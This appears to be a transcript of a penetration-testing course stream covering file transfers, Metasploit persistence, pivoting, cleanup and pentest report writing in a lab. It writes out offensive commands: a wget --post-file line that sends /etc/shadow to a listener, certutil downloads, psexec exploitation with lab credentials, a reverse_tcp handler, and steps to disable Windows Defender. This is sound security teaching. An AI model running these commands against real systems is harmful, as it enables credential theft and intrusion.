Zero to Hero: Week 11 - File Transfers, Pivoting, and Report Writing
Key Takeaways
The video covers file transfers, pivoting, and report writing in the context of cybersecurity, with a focus on tools such as wget, netcat, and Metasploit, and techniques like maintaining access, cleanup, and legal documentation.
Full Transcript
What is up! Shalom, Shalom. There's always a delay when I come through; it's also recording delay too, so I never know when to start talking. You would think after 11 weeks we'd have figured this out, but it hasn't happened. What's up, everybody who's in here, quite a bit of you. Bats in here, what's up Matt, what's up Sticking the Mine, what's up Richie, Reckless Pancake, Kev Runs on Dunkin, Flood Sex in here, yo, lots of familiar faces, happy to see you guys. I don't even know how to pronounce what you just said, Flood Sick. On this shoulder this is the Cheshire Cat; this arm is basically, well, it is all Alice in Wonderland. Yeah, it does look like tentacles, and it kind of is. How do I expect somebody to hire me? I guess I don't; I'm unemployable, guys. What's up Solo, what's up Deadly.

All right, we're gonna get started here. Let's go ahead and actually just get started; my dogs are going crazy, so that's awesome. I forget what buttons... there we go. Welcome, welcome. Unless you want to see my pretty face, we could do that, there you go, that's not too bad. Welcome to the last episode of Zero to Hero. We are week 11; you've made it to the end. So we're gonna do some quick housekeeping, we're gonna talk file transfers, we're gonna cover some cool little tricks that I like file-transfer-wise, maintaining access, pivoting, and cleanup. We are gonna do a lab on pivoting, we're gonna talk maintaining access and talk cleanup, and I'll get into that and the reasons why. Then we're gonna cover legal, we're gonna cover report writing, and finally we're gonna end on career advice. So we'll talk some legal documentation, I'll cover that example report that I put out, if you haven't seen it now's the time to talk about it, and then I'll give you my career advice, tips, etc., tip my hat and sign off. So we'll do Q&A, AMA at the end.

Let's just go right into the housekeeping. So like I said, this is the last stream. Immediately after this stream I will be breaking some protocol and I will be uploading the stream onto YouTube. There's a 24-hour waiting period; I'm just gonna YOLO out. I'm also going to be putting it on the Zero to Hero pentesting page on thecybermentor.com, so if you're looking for that repository it's on there as well. The course will be full and we'll be done tonight. 30-minute AMA, two reasons why: I am on three and a half hours' sleep. I want to party so bad with you guys, but I have a flight at six o'clock in the morning. As of just a few minutes ago I got a text message saying that they may have cancelled the flight, so that's great, because we've had this booked forever. My wife's handling that right now. The flight doesn't say that it's cancelled online, but the text message said it was, so she's on the phone dealing with Southwest Airlines right now. So as of right now, potentially leaving at 6:00 in the morning, so I'm drinking my Monster on three and a half hours' sleep. You guys ask me all the time how I get all the work done: because I never sleep. So don't be like me, definitely try to get some sleep. So because of that we're gonna push the drinking game into next week. Next week we'll just have a super, super chill chat. What we'll do is we'll drink, we'll hack things, we'll have fun. I'll try to pick a different topic that we haven't covered before, something a little different, and we'll just have some fun with it.

So other than that, a favor to ask of you guys: if you guys are enjoying the course, if you enjoyed your journey, please do consider leaving me some feedback. You could leave it for me on Discord, on LinkedIn, on Twitter; I would greatly appreciate that. Many of you already have, and that's awesome. Full disclosure, I am planning to do this course again in a paid version, which is just gonna include some more updated material. It's gonna have an actual lab built out to where we can VPN into it. So you guys got the free edition; the free edition covers pretty much everything I wanted to cover, the lab's just gonna be a little bit more upgraded, and I would love to use some testimonials if you guys don't mind that. So that's my only ask of you guys. Other than that, tell a friend, say "hey, you know, I enjoyed this course, you guys should check it out on YouTube" or whatever, that would be great.

So other than that, let's go ahead and just dive into our lesson. So I've actually put that in the wrong spot; we're gonna talk about transfers first, then we'll talk maintaining. So if you are looking to take the course, the course will have a discount for students, first responders, and military, vets, military active, doesn't matter, you just got to let me know ahead of time and we can work it out. It's gonna be a 20% discount if you guys want to retake this course. But anyways, let's go ahead and talk file transfers.

So tonight we're gonna do file transfers with Linux. Typically Linux file transfers include wget, so we're gonna look at wget, and then we're gonna look at some Windows tools: we're gonna look at HTTP, FTP, Metasploit, certutil. Stick in the Minds already getting ahead of me with tools. My disclaimer here is that these are not all-inclusive; there are many, many more tools that you're gonna be able to use for file transfers. These are some of my favorite ones. There's PowerShell, there's SFTP, there's all kinds of cool little tricks that you're gonna learn along the way. I'm just going to show you some of the basic ones, and hopefully you learn a couple of cool little tricks, especially with what we're about to see in our file transfer labs.

So without further ado, I'm gonna open up my VM here and we're gonna start with Linux. So with Linux file transfers we've already covered wget, right? We can go pull down a file off the web if we want to. You know, we could actually pull a file, I believe, from ourselves, so we could host up a file. Let's try that. And so all I'm doing right now is I am hosting; I've got a folder called files, and if we just say ls, I've got a file called secrets in there, literally nothing in there but something that says "secrets". And what we can do is we could host a Python
server. Now remember, I covered Python servers back during the Python lessons, but in case you forgot: python -m here, and we are going to do a SimpleHTTPServer, and you can just type in 80 for port 80. Let that run. So anything that's in this location here, the secrets.txt, is going to be out on the interwebs, and so all you would do is go into your interwebs and you can go to your own IP address. I'm sitting at 202.128, I believe, today. So we got the secrets.txt here, right? And if we come over here, in theory we should be able to wget our own file. We get to say http://192.168.202.128/secrets.txt. Now you can see that we grabbed secrets.txt, and it put it as a .1 because it already exists in the folder. And then if you come over to here, you see that it actually shows that we grabbed it, so somebody came in here and made some sort of grab. So we know that wget works.

Now there are some additional cool tricks that we can do with wget, and one thing that people don't know is that you can actually push out files from wget. So let's cancel this HTTP server here, and let's instead set up a netcat listener. So we're just gonna say nc -nvlp, let's just put it on port 8081, okay? So now imagine this scenario: you are on a machine that you have exploited, you set up a listener here, and what you can do with wget is there's actually this module in there, if you say --post-file like that, and then let's just say we want to get rid of this secrets, right, secrets.txt, and we want to send it out. Actually, let's do something better, this is more practical: let's say we want to send out the /etc/passwd or the /etc/shadow file, right? You can do this, and then you just type in the IP address, 128, and then you type in the port number at the end of it. It says awaiting response, but if you come over here, look what just came through. So it comes through like it is a web header, right, and then I've got the whole file that just came through
here. So this is a quick way to dump files off to yourself that I feel like a lot of people don't know about. It's pretty neat. So that's a neat little way to transfer files back and forth using wget with Linux.

So let's talk about Windows while we are at it. So you just saw, I talked about HTTP, you just saw me spin up a file server here, so python -m (somebody asked, the -m is for module), so we've got the -m and we're just listening on port 80 for any traffic. Now if we were on an RDP machine, then we would just come in, right, we'd say "oh, I'll just go down to the web server", that's easy, we've got GUI access, right, and we'll just download the file. And if we click on it you'll see that traffic comes through and somebody made a GET request to that secrets.txt; it just says "secrets". So that's a common way, a really common way if you've got access, GUI access, to a machine. But the rest of the ways I'm going to show you are for if you don't have GUI access to a machine. And let me actually make this fullscreen here so you guys can see. So I'm going to power on my Windows 10 machines, and I've got this lab set up for pivoting, so let me see which one is which. Okay, so for you guys you can log in to either one, but I'm gonna be logging into Frank Castle's machine, so this was the first machine that we set up. And again, from Frank Castle's machine, anybody on the network can go to that location; see, I've already got it up, but secrets.txt and secrets.txt.1 are in here.

Another thing that we can do while we've got this running: so imagine the scenario, you don't have GUI access, but you do have access via shell. There is a wonderful tool. Now I will note that this tool has been getting blocked lately by Windows Defender, and I have actually gone in and turned Windows Defender off in Group Policy. So if you want to do that as well on your machines, like some people were saying that the machines were turning Windows Defender back on after a reboot, and that is pretty
accurate. You can go into your gpedit on your local machine and just go in here, and then there's actually a setting. If we go into, let me cheat and look at my notes, so if we go into the Administrative Templates and then I believe it's Windows Components, and then there should be a Windows Defender Antivirus right here. So there's this little policy, it says "Turn off Windows Defender Antivirus". If you double-click on that and you say Enabled (it should be Not Configured by default), if you say Enabled this policy will turn it off. You just hit OK, then you reboot and you are good to go. So if you want to do that for all your machines you're more than welcome; if not, you may have to turn off Windows Defender again tonight for some of the activities that we're gonna be doing anyway.

So there is a tool that I like to use. If you go into command prompt, this simulates what a shell would be like. What we're gonna do is we are going to use a tool called certutil. This is fairly common, and I don't feel like a lot of people know about it. So we say, apparently I'm not typing in here, we say certutil, and it's built in to almost all of Windows, like for a long time now, I couldn't tell you since when. But this is kind of the equivalent of a wget. So you say -urlcache, the -f for a file, and then you just grab the file you want, so it's http://192.168.202.128/secrets.txt, pull it down, you say dir, and oh, I messed up, you've got to name your file, so we'll just call it secrets.txt like this. And then it says "completed successfully", let's dir, and then you see the secrets.txt is here. We could type it, make sure it actually came over correctly, and you see it says "secrets". So that's a neat little way. There's some more advanced methodology behind this too; there's actually a way to split the files and then rejoin the files to kind of bypass some antivirus. I've never actually had it work, but I've read blogs on it where it shows it working, so there's
some little tricks on that on the more advanced side. But just know that certutil, especially if you're doing things like capture the flag or, you know, Hack The Box, even OSCP stuff, this is a neat little trick that you can use to bring files over.

So on top of that, there is one more trick that I would like to show you, and that is FTP. And let me make sure that is the only trick I want to show you; I don't have all my notes up. Let's see, where's my PowerPoint: HTTP, FTP, and Metasploit, of course, Metasploit. So we can also spin up an FTP server. Now if we come back into here and we kill this, now with Python we can spin up a quick FTP server module as well. It's called pyftpdlib; you just type it out and hit tab, and then you do a -p for port and 21, like this, and start running it. Now some of you might be trying to run this and it's not working; the reason that would be is because you didn't install it. If you've been following from week one, I had you install this either week one or two, one of the early weeks I believe. You can just do a pip install of pyftpdlib and that should get you where you need to be. But either way, just like the port 80 web server we just spun up, this is the port 21 FTP server that we're spinning up. We can come onto our Windows shell and we can say ftp and then type in the address you want to go to. It's gonna say okay, you've connected, what's your password? Using a password, just type in anonymous, anonymous, preferably wearing your Guy Fawkes mask, right? And then you are here. So you could say dir, and again, same thing, all the files it's gonna share are right in the folder that you spin it up in. So again we have the secrets.txt. You could type in, I think it's help, to find all the things that you can do, but you can put files in here with put, so you can transfer files out, and you can also get the files from this folder as well. So you would just say get secrets.txt. So it's fairly straightforward, one of the easier ways to transfer files as well. Okay, so
let's go ahead and exploit our machine again. We've got this Windows 10 machine here; remember we have a psexec exploit for it, so I'm gonna exploit the machine, and we're gonna just kill this. And I've got some questions coming through: is there any reason why you shouldn't do it in bash, service vsftpd start? Because that turns it on permanently; this is just an easy on/off, right? So you've got your service up and then you've got your service off. It's the same thing with the web server, like the web server's running and then that's not running, right? The other way is you start up your web server with, let's say, Apache, then you have to go put it in your folder, like you have to go put it in your www folder to share it out. Here you can just share the folder you've got right away; you don't have to go put things and items in locations you want, it's just an easy spin-up. So it's instant, and this is why a lot of people have moved to Python for spinning up these quick servers.

Okay, so let's get into Metasploit. If I'm going too fast, guys, let me know; I'm just trying to get through everything tonight. And I saw some people came in: hey Jeff, how's it going, hey Dan, nice to see you, man. Okay, so we are gonna exploit our Frank Castle machine one more time. So we're gonna say use exploit/windows/smb/psexec, should be familiar from all the previous lessons. We say options, okay, we're gonna set our RHOSTS. My RHOSTS for this machine, I think, is 134, I don't want to be wrong here, okay, it's 202.134. We're gonna set the SMBDomain as MARVEL, set SMBPass as Password1, set SMBUser as fcastle, and let's set the target as 2; remember it's got the automatic target and sometimes it works, sometimes it doesn't. See if this even works. Denied, that's okay, we'll try again, try again, try again. Okay, we've got our shell.

So one of the nice little features about Metasploit is it's got a lot of stuff it can do. We've been doing pretty much all of our work in Metasploit; it is
so robust and so awesome. I'm the biggest fan, skiddie, whatever you want to call me, when it comes to Metasploit, I'm all about it. So if you come in here, there is an upload and a download. I might go by it, I don't know, I'm not good at seeing things, just trust me. Okay, there it is, upload and download. You pretty much have full control anyway here, so you could say, like, I think it's like pwd, present working directory, okay, we're in System32. We can change the directory to C:\Users, and then we say pwd like that; note that I put in the second slash there for character escaping. So we're in the Users folder; if we say dir, okay, there's a couple of users. So what I want to do is I want to upload this secrets file into this folder, so we're just going to say upload secrets, and you could do this, you know, you could do this with any file, it doesn't have to be in the directory you're in. You could say /root/, whatever file, secrets.txt, something like that, and then if you want to put it in this folder you would just say secrets.txt, or you could say, let's just put it in the C drive, right, something like that. You just gotta declare where you're putting the folder or the file, and then it says it uploaded it to the C drive. Let's go check out our C drive, and there it is, secrets. So same concept, right, we can download that file to our... maybe, maybe not, oh, because I didn't declare .txt, I'm getting all fancy here. There you go, so we can also download the file in Metasploit. One of the fastest ways, if you've got a meterpreter shell, you might as well just use this to transfer your files instead of doing it through a shell yourself. One of my absolute favorite ways.

So while we are in Metasploit, let's talk our next PowerPoint section. I put this in the wrong order, so let's go back, and we're going to talk about maintaining access with meterpreter. So we've got a few different things I want to talk about; these are all in meterpreter. Like I said, we've got persistence scripts,
we've got scheduled tasks, we've got metsvc. Now I'm not going to be showing you any of these tonight. These are likely really not gonna come up in a junior-level pentest. I don't, honestly, I don't see persistence much. Like for example the run persistence, this -h is just a help, and I can show you that, like we could talk about it. Let's go back; this is just like a really dangerous thing to run. And you say -h like this, and so you have to declare all these values, right, but what it does is, okay, what options do I want? Do I want to automatically start an agent when it boots as a service, do I want to start an agent when the user logs in, do I want to start an agent when the system boots, what's the IP of the system that we're gonna reach back to, what's our IP, our attacker IP, do I want to set a port, right? Now if you go and read the Metasploit documentation, you read Metasploit Unleashed, it tells you that this is a very, very dangerous module to run; that really, as a penetration tester, you don't need to be running this unless you absolutely need to. And the main reason is it just opens up a port on a machine, that port doesn't have any credentials, you just basically connect back to it, right? So you're just leaving it wide open for a future attack, and you actually have to go back in and delete the service. It does input it into the registry; you have to remove it from the registry. This will give you an RC file, if you're connected, to go in and actually delete all those files for you, so it does have some cleanup. But tools like this are dangerous, and there's not a lot of need for them when it comes to, I would say, junior or mid-tier level pentesting. If you're doing red teaming or something where you're being very, very discreet and you need a computer, you're on a host and you don't want to lose access to that host, that's a completely different situation. But when you're in a time-limited engagement, chances are
you're not going to ever need this. So I'm only going to show you the high levels for this; we're not gonna go too deep into it, because it's just going to be deeper than we need to go. So let's go back to the PowerPoint. So we can do it through persistence scripts; there's a few here. exploit/windows/local/persistence is pretty close, if not the same thing, to this persistence that's aged; it just allows you to upload malware. There's actually some, if you do a show advanced, it allows you to use your own executables instead. There's a registry persistence as well. There are scheduled task persistences, so that way you can schedule a task, basically, to run the same time every day that runs your executable, so that way you gain a shell at least at some point, right, and you would just sit there with a listener. And we haven't actually covered the listeners, and I can show you what I mean by this listener. So you could have like a netcat listener, but if you're trying to gain a meterpreter shell back, let's just background this session that we've got, so we can use something called exploit/multi/handler. And if we say options on this, so it doesn't really show you what it does. Oops, I moved my screen, I'm sorry guys, and it cannot go back, there we go, don't know if you saw that, but sorry, I clicked the wrong thing. So it really doesn't show you what it does here, but what we can do is we actually set a payload. So we'll say okay, the payload I'm gonna be sending through this exploit is going to be windows/meterpreter/reverse_tcp. Hey, thanks Matt, I appreciate that. And then you say options again, and now you'll see that it gave you this reverse TCP. You might set the LPORT to something sneaky; you might say set LPORT to 443 so the traffic goes out on a known port, and then you would set your LHOST, right, whatever your IP address. So our LHOST is 192.168.202.128, and then you would just say run. Now you can run this with a set of switches that'll
put it in the background and just listen, but just to get an example, all you're doing is running a handler. This is very similar to netcat where you're listening; we're listening right now on 443 for any traffic to come in to this IP address, and if it matches this payload it'll talk back, it'll start up a meterpreter shell, and that's how these persistence scripts run with malware. So other than that, I encourage you to look into these. If you want to play around with these, build your own lab; just note again that you're gonna scrub the machines when you're done, because these do leave open ports. So make sure they're VMs or you are closing the registry entries and open ports when you are done. So going back in, you can also look into metsvc; it's similar to the rest, another persistence module. This is not all of them; there are actually a lot of persistence modules in meterpreter, but these are the generic ideas: you want access to come back to you if you lose it. If a machine, like you have a laptop you access and they take it offline, so they go home, when they go back you want it to connect and talk back to you. So that's the thought process.

So what's up next? Not cleanup; we're gonna go talk about pivoting. So let's talk about building. Okay, so we are gonna do a pivoting lab together; we're gonna build this out. I've already got mine built out, so I will try to be as patient as I can be. And what we'll do is we will come into here, and let's go into Workstation up here, and I want you guys to go to Edit, Virtual Network Editor. "Pivot!" Yeah, I wanted to use that in this talk, I guess, but I was afraid that I was gonna get sued by Friends or something along those lines. Do I send the slides on Discord? I don't ever send the slides out. I could; I don't actually think I have a slide saved, if I'm being honest with you. I've been running the same PowerPoint, just deleting it, but you're more than welcome to take screenshots or whatever you like. So this is kind of hard to see, and I
don't understand why, what is going on. Okay, so there we go. So you should see this, something like this, right, and you might just have a 1 and an 8 here. I need you guys to go into Change Settings, and that's an admin prompt; it's gonna bring this back over again. Okay, so you've got your auto-bridging VMnet0, you've also got a 1 and 8. Go ahead and just hit Add Network, and I set it to be VMnet7, so look at my settings and I'll go as slow as I can at this. Go ahead and select Host-only on these settings, and then at the bottom we're gonna give it a completely different subnet. We're gonna say 10.10.10.0 with a subnet mask of a /24, so all 255s with a 0 at the end. And then you should have your typical 192.168 down here with NAT running, 202.0 while I'm on, whatever you guys are on, however you've been connecting. You want to use this guy here. So we're gonna hit OK.

Now we're gonna have to do some editing. Here's the situation, here's the scenario, let's set that up first. We are on a 192 network and we are attacking a network. We've plugged into the network or gained access, so we're attacking a network that is this 192, and we've gained access to a machine, and we're going to gain access to a machine. When we gain access to this machine, we realize through our enumeration, our post-exploitation enumeration, that it is a dual-homed machine, meaning that it's running on two different networks. So we see, okay, it's running on a 192 network and it's running on a 10-dot network. So we have until this time not been able to access that 10 network; we can only see the 192 network. So what I've done is I've set this up where our Frank Castle machine, if we come into Frank Castle, he is running a dual-homed machine. And let me blow this up again; you go to the ipconfig, you could see he's got a 192 address and a 10.10 address. Now we've also got a Peter Parker machine I'm gonna power back on, and I'm just gonna log in as the administrator here. Two times the hot action, that sounds about right. All right, we say
command, ipconfig, 10.10.10.129. So these two machines, they can talk, right? But with this machine we won't be able to talk. We say ping, okay, well, it shouldn't be able to talk; it's talking through Metasploit, I got ahead of myself, sorry. Or it's just talking, I don't know what's going on, it hates me. Okay, no idea why they're talking; should not be talking, guys. So if we go in here, this is all on its own network, right, and the domain controller is also on two networks. Let's take a look, if I can get out of this screen. Now it's not letting me; I am so frozen right now, guys, I don't even know what to do. Let's see, can I come back? All right, there we go. Okay, so if we come into here and we say command, you can see that we're running on 192 and we're also running on 10.10.10.128.

Now let's talk about the lab setup, and for you guys, in theory, it should not talk. I've been doing a lot of pivoting in the last couple of days, so maybe there's something that got set up, some routing table that got configured. I did do an autoroute with my meterpreter and it may have set a routing table for me, so I'm not sure of the reason. Anyway, let's set this up. You're gonna have to shut down all of these. So what we're gonna do is we're gonna shut down all the machines, and I'm just gonna leave mine on and running, but go ahead and shut yours down, or your machine that we just exploited, the Frank Castle machine. What you're gonna do is you're gonna go into... actually I'll pause it, so I can show you in your shutdown state. We're gonna edit the networks, and I'll pause all these so I can show you. Okay, so if we edit the virtual machine settings, I won't be able to do this because I am still powered on, technically, just because I'm on pause. I have one network adapter on Frank Castle that is running NAT; I've got another network adapter that is running VMnet7, remember that's the second NIC, right? So Frank Castle is gonna have two NICs. And then we come over
to Peter Parker. Peter Parker is gonna have one NIC, and he's going to be sitting on the 10 network. And lastly we are going to come over to the domain controller, and we are gonna say I've got VMnet8, it's the same thing as NAT; VMnet8 and VMnet7, so two separate NICs. So go ahead and configure those. I'm going to resume these real quick and maybe troubleshoot why these machines can talk. Can this reach the other way? Cannot. So another thing to note once you guys get everything powered back on is, if we come into the network adapter for Peter Parker, I'm just going to go into Network Status and then Change Adapter Options. Okay, we'll go, let's see, Network and Sharing Center, since it wants to be rude, we'll do it that way. The only reason I'm changing this: so I've got the preferred DNS of 192.168.202.150 and then an alternate DNS of 10.10.10.128. Those should line up with here, 202.150 and then 128, just so it's talking, and if it fails over it's still talking. It's not connected to the internet because it's not connected to anything available to be connected to the internet; it doesn't have to be connected to the internet for this lab to work. What's important is that we can ping from our Windows 10, that we can ping the other machine, it's a 129. What I'm troubleshooting, Sick of the Mind, is why my Kali machine that is sitting on a 192 network is able to talk out to a 10 network that it shouldn't know what it is. This should not be happening, right, and earlier it wasn't happening, so I'm guessing that I had some sort of route that it learned, and it can't talk back the other way, but it can definitely talk forward. So I'm not gonna worry about it; the lab will hold up for its purpose, guys. All right, how are we doing on the resets? If you're following along, have you reset everything, are you back up and running? I know this is a little bit of procedure; I just didn't want to have to show all
of it. Classic demo problems, absolutely. All right, we're going to run the service networking restart. That we're saying, still pinging; it's fine, guys, I'm not gonna be too worried about it. So let's continue on. So we'll pretend happily that we are unable to talk to that machine. What we have is access, right, to a machine in meterpreter. So let's actually, it's backgrounded, let's go to sessions. We have no active sessions; we lost it, never mind. So let's get our session back. So let's go to use exploit/windows/smb/psexec, options just to make sure we're all the same, let's try running it. Okay, now we can try some pivoting commands. We can first look, I'm actually curious, let's look at the routing table, if we've already got some sort of autoroute. No routes have been added yet. So, hey, thanks Grayson, I appreciate that. So we've got no autoroutes, but what we can do here is we can say run autoroute and then do a -s, and then we want to connect to that 10 network, right, so we're gonna say /24. Okay, now if we run the command again you'll see we have a route in there through session 2.

So if we go, actually I want to show you, if we go into a shell real quick, so some things to note, right? So if I am an attacker, and I want to see if a machine's dual-homed, a couple of things we can do is you can say route print, and we can look at the routing table, right, and the routing table shows us that there's a 10 network and there's a 192 network, so that would be an indicator. You could also look at arp -a and see the ARP table, and you can see that there's a 10 network in here and there's a 192 network as well. A netstat might show us some things if there's any communication between the two, if they're talking over something; you can see a 10 here and a 192 here as well. We can see where it's established, you know, some connections talking out here on 443. So sometimes in lab settings they've got a machine talking to another machine for some purpose or another, so if you see a
connection here over one port to another, you might see that in the real world as well, but just things to look out for. This is how you'll be able to identify the machine is dual-homed outside of the ipconfig, right, but you just want to notice these things. So Ctrl-C. Now we've got our autoroute going; now in theory we should be able to communicate with that machine that we weren't able to communicate with, wink wink, right? So we can do some things. We could say use auxiliary, actually, better background this, we could say use auxiliary/scanner/portscan and then we could do a tcp scan, right, and if we say options, okay, so we can set the RHOSTS to 10.10.10.129, and then we get to set the ports, right; it's gonna scan 1 through 10,000. Scanning on a pivot is incredibly slow, so just for a proof of concept, what I'm going to do is, we know that SMB is open because we opened folders on this in the past, so we're just gonna say set PORTS 139, and then we're just gonna run this. Okay, and you see that it says port 139 is open on that machine, right? So we're going through the machine that we exploited and we're scanning against it. Now I wasn't able to get this to work, but I will try for some on-screen magic and see if we need it to work. We could try using the exploit again; say that we dumped hashes or we knew credentials or something, right, and we've got local hashes and we want to pass the hash around to this new network. We could try to use the exploit again with smb/psexec and see if they work. If we go options, we know that the RHOSTS is 10.10.10.129, and I'm going to change the port to all fives. Now the MARVEL is still the same, but let's change the SMBUser to administrator just for proof of concept, set the SMBPass to what we've been using, let's hit run. I heard a ding in the background; chances are it blocked it with Defender would be my guess. Okay, yeah, I'm not going to worry too much about it. We can view the details; it sounded
like it blocked it. That's typically what happens, but just know as a proof of concept that you can run these exploits through one machine to another. This is the idea of pivoting. And yeah, so if you see a dual-homed machine, you might be able to transition off of one network into another network, leverage that access and navigate around. Would you often exploit users with Windows Defender disabled on pentests? You would be surprised; a lot of places aren't using Windows Defender. Windows Defender has really just stepped up its game as to what's going on, but that doesn't mean that places are patching and allowing their Windows machines to update for these. They might be using other antivirus that doesn't pick up on this; you might use obfuscated malware and concepts to try to log in instead. That's why psexec has got the PowerShell, it's got, you know, different options; you might try to do different things to get around it. So good question, though.

All right, and that's really it for the pivoting section. Let's talk really quick about cleanup. So again, we're going to just talk cleanup; we're not going to actually demonstrate. And now this cleanup that I'm providing is in regards to pentesting. The other cleanup that you hear about in the hacking methodologies is more about, you know, removing your tracks completely, you know, like eliminating logs, any sort of system events, proof that you were there at all, right? This type of cleanup here is more geared towards pentesting; this is an actual, you know, a realistic network pentest course. So just a few notes, and the source is down here from where I stole all these from, but you're gonna want to remove any executable scripts or temporary files from a compromised system. If possible, use a secure delete method for removing the files, right? You want to get rid of all the malware you put on a system, you don't want to leave that. You want to return all the original values for the application parameters if you modified them. You want
to remove any backdoors like you saw with the persistence any of those any user accounts you created a lot of times you'll create an account to access a machine or to plant a flag or whatever any of these accounts you want to delete them when you're done so you want to leave it like you found it right you don't want anything in there that is malicious or could lead to a breach or something a weakness for the the client at a later time so you need to make sure that you're you're cleaning up your mess is essentially the the whole point behind this so that's that's all my speech for cleanup and that's really it let me bring you guys back I'm gonna grab a drink of my monster and we are on decent timing actually okay so next slide we're gonna get into the legal and the documentation so we're gonna talk really quick about the sales some of the before you test and the after your tests we're gonna go through the through a sample report and talk about that as well so in the sales process when you first meet your client or you sit down you want to talk to your client and most of these you're probably never gonna deal with maybe as a manager level you might deal with some of these but you're gonna have a mutual non-disclosure agreement meaning that you're not going to give out the client information the clients not going to give out your information that you don't want them to give out so whether that's pricing structure or your sales methodology or any documentation you give them it's all under NDA and whatever they tell you about their network you can't go tell somebody else about that right on top of that you're likely to have some sort of master service agreement now I linked one for rapid7 all you really have to do is just type in master service agreement pentesting and all of these the big names will come up with their own master service agreement they're all public knowledge out there it's basically just a contractual document so it just says like these are the 
performance objectives and you know what the the responsibilities are both parties there's just all legal mumbo-jumbo but it's the the agreement you signed before doing work on top of that there is a statement of work which is your what activities you're going to do what deliverables are you're going to provide what timeline you gonna provide them on right so like I'm gonna do a web application assessment I'm gonna deliver you a report when it's done and I will get you that in two weeks time and that's your statement of work you're likely gonna have costs on there what the costs are gonna be and what the payment terms are gonna be as well so and sometimes you'll see that the statement of work it's also sometimes the rules of engagement as well on some places I see slip them out some places they're both the same thing once the statement of work is signed this rules of engagement signed so but before you test regardless you need that statement of work slash rules of engagement to to go write it because your rules of engagement also has your scope details like you can't attack this specific machine or you can't use social engineering or you can't perform denial of service or you can't use a certain tool right like you need to know what you can and can't do what machines you can and can't attack that's very critical that you stay in scope because if you go out of scope you can get in pretty big trouble so I said cya cover your ass this is a cover-your-ass document right other process in the sales you're gonna probably have a sample report that you give to a client you probably want to have recommendation letters etc so any of these things that you can give to a client or potential client and say hey here's more about me the process whatever this all helps in the sales side of thing so after you are all said and done you do your testing you have a report to deliver now I have released this report on github I'm also gonna show it to you here there's a video on YouTube 
it's all over the place so if you want to see this again and you don't like this presentation then you can go watch it elsewhere download it play with it do whatever so this is your yours to use yours to modify years to do with whatever you want just make it your own you know so this is just a standard idea I'm actually gonna make this a full screen so standard idea of how I would organize this when I actually give this to clients I'm gonna have a little bit more details in here so this is gonna be bare-bones for you guys but it's it's gonna be the same pretty same or closed structure when I actually give this to clients as a sample report so you see here I've got the header says demo company security assessment findings report its business confidential it's got today's date on it it's got a project number version number again business confidential of blah blah blah you've got a fancy table of contents okay and then at the top you've got a confidentiality statement it just says that this is between demo company and TCM security and it contains confidential information basically you're not going to duplicate redistribute this in any part form without the consent of both parties so on top of that it says you can share this document if we need to actually this says TCMS this should probably say DC can share this document with auditors under non-disclosure agreements demonstrate penetration test requirement compliance so sometimes you have audits and compliance requirements so it's not saying that you can't share it but as long as the other people are under non-disclosure that's fine here is a disclaimer the big thing that you want to note to potential or to clients is that a penetration test is considered a snapshot in time the day after you finish your test and exploit can come out a miss configuration can occur something can happen that causes a vulnerability right and you want to make sure that they're aware of that you also want to make sure that they're aware 
that this was a time limited engagement if you're only given a week chances are you're not going to find every single thing on an assessment especially if the assessments full of vulnerabilities so what we say is we prioritize them to point out the weakest controls and then we gave them full report information for further details on top of that you always want to include contact information so who are the important contacts from the company or pentesting who are your important contacts here okay you're gonna give an assessment overview you're gonna say hey we were engaged from these dates to these dates and we evaluated the security posture based on best practice and that included this is just an external penetration test of this one but if you had more components and you would list those in there all testing is performed on the nist SP 800 guideline also we do tests on the olaf's testing guideline and customized testing frameworks these phases of penetration tests come from the nist SP 800 so there's planning discovery attack reporting you just talk about what that is I may have a tiny little infographic here that shows you know you do planning you do discovery you do attack you report on what you attack but then if you also get in you do some additional discovery repeat the process and report so with that you also want to include the assessment components that you perform right so you're performing an external penetration test so this just gives you a high-level overview of what a external penetration test is it says we're going to use a employee information historical breach information we're gonna perform scanning enumeration to identify potential vulnerability and hopes of exploitation so if you had an internal you would know what that is you would note web app you know social engineering whatever the engagement you would have a list of all your components so coming through here now we've got a finding severity rating this just says what the ratings might be 
from critical to informational what the CVS sd3 score is comparatively for those and what the definition is like a critical is exploitation super easy it led to like system of a compromised RCE some sort you need to plan an action right now and patch immediately we're a low is like yeah it doesn't lead to an exploit but you know best practice states that you should probably patch it in the next maintenance window but you know not a big deal if you don't so we have this findings chart just so you know the customer is aware what what each finding means and then going through that this page is it's a little lackluster I want to add some more to this but you always want to include the scope and there would be a you know there'd be more information here for every assessment component you did so if there was an external and internal web app you would give all the details of what you tested now I know these are internal IP addresses I'm wasn't gonna put external IP addresses out there because somebody probably owns those but you would just say hey I tested this range and this range whatever and then full scope information is provided in a additional full findings excel document that's where you list out all the findings that you found with notes on them and then you would say like if you had 50 IPS you were testing against you might not list them all here you might just say I'm testing against 50 IP addresses other than that you want to have the scope exclusions right so we didn't perform any denial service attacks during testing on top of that we have client allowances right so did they provide us a pass did they provide us you know any sort of things that allowed us any kind of help on this testing you want to notate that so on top of that scroll down now you want to do an executive summary and you want to do a technical summary right so the executive summary is for your sea level the sea level just likes to see things I'd like to see pretty pictures they don't really 
care about the muddy details right so you want to give them everything up front that you can give them so a quick blurb here it says we did the testing from this date to this date by leveraging a series of tacks we found critical vulnerabilities and we were able to gain full internal network access to the headquarter office and then we gave an attack summary of how we were able to gain internal access and some of the recommended remediations so from here like we obtained historical breach account credentials to leverage against the company login pages so a recommendation there is to discourage your employees from using work emails and usernames as login credentials to other services unless necessary all the way down to we leverage valid credentials to log in to the VPN well they permitted VPN access right oh ah did and the VPN did without multi-factor authentication so we recommend that they use authentication on all services so on all external basing services so here you would provide some strengths and weaknesses so an example of a strengths is ok well there sim was alerting on vulnerability scans as soon as we started scanning they alerted us that they saw as they verified our IP address and they had the opportunity to blacklist us from further action you would probably want to provide here at least three to five good strengths that they had and you would want to provide you know if they had weaknesses three to five weaknesses and probably fill out two pages with this so the more information that you can provide the better again this is just a bare bones report so here is the ulnar abilities by impact basically this is a chart that says critical high low moderate whatever how many of our abilities did we find by each impact there's only one finding on this report and it was a critical finding so there's only one critical you probably put a little bit of blurb down here about why the finding is critical what whatever you know you could add and make this your own 
